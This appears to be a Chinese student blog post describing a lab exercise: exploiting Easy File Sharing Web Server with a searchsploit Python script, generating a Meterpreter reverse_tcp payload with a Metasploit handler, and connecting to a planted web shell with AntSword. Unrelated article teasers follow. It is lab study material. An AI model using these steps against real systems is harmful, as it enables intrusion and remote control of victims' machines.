一、漏洞测试
打开easy file sharing web server
进入后修改端口
点击go可以看到
之后打开kali用searchsploit easy file sharing扫描漏洞
利用对应的Python脚本攻击
攻击完成,说明无法阻挡本身漏洞
二、kali生成被控端和启动主控端
先ifconfig查询kali的ip地址然后生成payload
www.virustotal.com的检测结果
然后启动主控端
然后依次输入1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
3.set lhost 目标ip
4.set lport 5000
5.exploit
然后靶机打开payload.exe即可
三、蚁剑控制目标网站
打开phpstudy,启动apache和MySQL
然后生成shell.php
最后打开蚁剑,url地址填http://ip地址(一般为127.0.0.1)/shell.php,连接密码cmd即可
远程控制复现
张小明
前端开发工程师
系统流异世探险动态漫制作2025推荐,全方位解析
系统流异世探险动态漫制作2025推荐,全方位解析在当今的动态漫制作领域,系统流异世探险题材凭借其独特的魅力吸引了众多观众的目光。然而,要制作出一部优秀的系统流异世探险动态漫并非易事,需要在多个方面进行精心策划和制作。本文…
vue基于Spring Boot的婚恋相亲交友网站_6wivw6dp
目录 具体实现截图项目介绍论文大纲核心代码部分展示项目运行指导结论源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作 具体实现截图 本系统(程序源码数据库调试部署讲解)同时还支持java、ThinkPHP、Node.js、Spring…
vue基于Spring Boot的教育ppt资源分享下载推荐平台_y9ktf0ec_
目录具体实现截图项目介绍论文大纲核心代码部分展示项目运行指导结论源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作具体实现截图 本系统(程序源码数据库调试部署讲解)同时还支持java、ThinkPHP、Node.js、Spring B…
第二十七周周报
文章目录 摘要Abstract一.背景分析二、创新点三、实验和结果分析总结 摘要 本周研读的文献《基于 GAN 的中文虚假评论数据集生成方法》针对当前中文虚假评论检测研究中缺乏公开数据集的现状,提出了一种利用生成对抗网络(GAN)构建中文虚假评论…
高效的5个pandas函数,你都用过吗?
之前为大家介绍过10个高效的pandas函数,颇受欢迎,里面的每一个函数都能帮我们在数据分析过程中节省时间。pandas还有很多让人舒适的用法,这次再为大家介绍5个pandas函数,作为这个系列的第二篇。1. explodeexplode用于将一行数据展…
基于Java的安全生产考试座位签到智慧管理系统的设计与实现全方位解析:附毕设论文+源代码
1. 为什么这个毕设项目值得你 pick ?安全生产考试座位签到智慧管理系统主要功能模块包括会员管理、机构管理、考试安排管理、座位管理和理论签到管理。该系统采用SpringMVC开发框架,MySQL数据库,并结合JavaScript和ECharts.js实现数据可视化。普通员工负…